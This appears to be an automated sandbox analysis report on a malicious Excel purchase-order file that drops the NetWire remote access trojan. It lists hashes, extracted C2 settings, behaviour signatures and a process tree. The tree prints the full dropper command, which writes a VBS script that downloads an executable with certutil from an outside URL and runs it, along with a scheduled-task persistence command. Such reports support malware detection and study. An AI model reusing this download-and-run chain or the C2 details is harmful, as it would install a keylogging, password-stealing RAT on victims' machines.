Analysis

  • max time kernel
    100s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10-10-2022 14:20

General

  • Target

    ADX07408 PO.xls

  • Size

    144KB

  • MD5

    5ed9dc08ff9847d0559f1bcd0665fa99

  • SHA1

    acd766133e3f29abf8e450df63c04fcb40405ad7

  • SHA256

    8ab1f75580a67bafa1866c71787864c366f73ee9ec34540c9ab370f6a5b0ddaa

  • SHA512

    5e8554d478a7cf3d3d8274c6783e6995ba5a8be1a24d117c98d7c25796800382f8b30eca14e50b805aac709ed6841109933909073360eda138ca989566123a53

  • SSDEEP

    3072:hk3hOdsylKlgryzc4bNhZFGzE+cL2knAL9pWkmanzr0O8qFKdshErlsD9+Z:hk3hOdsylKlgryzc4bNhZF+E+W2knALS

Malware Config

Extracted

Family

netwire

C2

37.0.14.206:3384

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • install_path

    %AppData%\Install\Host.exe

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password234

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 2 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ADX07408 PO.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:768
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tulpexim.com/html/dll.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\SysWOW64\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:592
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://tulpexim.com/html/dll.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1616
          • C:\Windows\SysWOW64\certutil.exe
            certutil.exe -urlcache -split -f http://tulpexim.com/html/dll.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
            5⤵
              PID:984
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bin.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1312
            • C:\Users\Admin\AppData\Local\Temp\bin.exe
              C:\Users\Admin\AppData\Local\Temp\bin.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1292
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NSopOOoiUVq" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6643.tmp"
                6⤵
                • Creates scheduled task(s)
                PID:268
              • C:\Users\Admin\AppData\Local\Temp\bin.exe
                "{path}"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:940
                • C:\Users\Admin\AppData\Roaming\Install\Host.exe
                  "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1976
        • C:\Windows\SysWOW64\timeout.exe
          timeout 3
          3⤵
          • Delays execution with timeout.exe
          PID:856

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • C:\Users\Admin\AppData\Local\Temp\script.vbs
      Filesize

      286B

      MD5

      b617731d1ae5b4cc113e476295d0dd53

      SHA1

      3640d4360758a50b547b5bf53fa8a0af2105a906

      SHA256

      660e8f9cb81f8e6da98ab1e1e9acd95ac54d7b59b97cfb22dc310edd9134df1e

      SHA512

      f7978246e6287deff350b9ace96c141b83184d7e559fb2c3080e7d2dc25a668bc3aa608b3821f860ab9db1c2d869488245eaf311e8f71793cd2224447721d3f4

    • C:\Users\Admin\AppData\Local\Temp\tmp6643.tmp
      Filesize

      1KB

      MD5

      6840a55def503695893d606fc14ba7e3

      SHA1

      d98f85a129310698e82249e0b12620f02f7f394e

      SHA256

      80b6744875db877fa0d0306a7a2ae70835f909e8cd33d46c8f3706b6bb07ea45

      SHA512

      75dbb7adaf5ff8d88d4b8cb19ec0b91d7a07f6431721072db7dfbd32d2ff000d38e6c3c39f3353485b7024a7b54eff5a3796cd3da209ad78b62ef24b4dbf4d6d

    • C:\Users\Admin\AppData\Roaming\Install\Host.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • C:\Users\Admin\AppData\Roaming\Install\Host.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • \Users\Admin\AppData\Local\Temp\bin.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • \Users\Admin\AppData\Local\Temp\bin.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • \Users\Admin\AppData\Roaming\Install\Host.exe
      Filesize

      1.2MB

      MD5

      29b108e40acb05c3c9c2fa8c19b166e3

      SHA1

      892c676275a723822d2d47dc1a48defec8bde643

      SHA256

      4fa7679f4f0241ed1e5d63fbae526ff506dd45c350badb0cbb02f7aca61e0ad5

      SHA512

      9cee10259615c90ea51710fd119dc9c8899b8bf4363513ecbc79aa3a69351c68625f5ca5e7c521d2346a54640358eb2deba0fd6db08a7ade5d2970304ad5beb2

    • memory/268-144-0x0000000000000000-mapping.dmp
    • memory/564-123-0x0000000000000000-mapping.dmp
    • memory/592-124-0x0000000000000000-mapping.dmp
    • memory/768-59-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-64-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-83-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-91-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-99-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-107-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-115-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-67-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-54-0x000000002F1D1000-0x000000002F1D4000-memory.dmp
      Filesize

      12KB

    • memory/768-171-0x0000000072CFD000-0x0000000072D08000-memory.dmp
      Filesize

      44KB

    • memory/768-55-0x0000000071D11000-0x0000000071D13000-memory.dmp
      Filesize

      8KB

    • memory/768-60-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/768-57-0x0000000072CFD000-0x0000000072D08000-memory.dmp
      Filesize

      44KB

    • memory/768-133-0x0000000072CFD000-0x0000000072D08000-memory.dmp
      Filesize

      44KB

    • memory/768-58-0x0000000076871000-0x0000000076873000-memory.dmp
      Filesize

      8KB

    • memory/768-61-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-66-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-62-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-65-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-75-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/768-63-0x0000000000666000-0x0000000000671000-memory.dmp
      Filesize

      44KB

    • memory/856-127-0x0000000000000000-mapping.dmp
    • memory/940-158-0x000000000041AD7B-mapping.dmp
    • memory/940-166-0x0000000000400000-0x000000000044F000-memory.dmp
      Filesize

      316KB

    • memory/984-131-0x0000000000000000-mapping.dmp
    • memory/1072-126-0x0000000000000000-mapping.dmp
    • memory/1292-139-0x0000000000E20000-0x0000000000F4E000-memory.dmp
      Filesize

      1.2MB

    • memory/1292-137-0x0000000000000000-mapping.dmp
    • memory/1292-142-0x0000000009560000-0x0000000009636000-memory.dmp
      Filesize

      856KB

    • memory/1292-141-0x00000000003F0000-0x0000000000410000-memory.dmp
      Filesize

      128KB

    • memory/1292-143-0x0000000008FB0000-0x000000000903C000-memory.dmp
      Filesize

      560KB

    • memory/1312-134-0x0000000000000000-mapping.dmp
    • memory/1616-130-0x0000000000000000-mapping.dmp
    • memory/1976-164-0x0000000000000000-mapping.dmp
    • memory/1976-168-0x0000000000210000-0x000000000033E000-memory.dmp
      Filesize

      1.2MB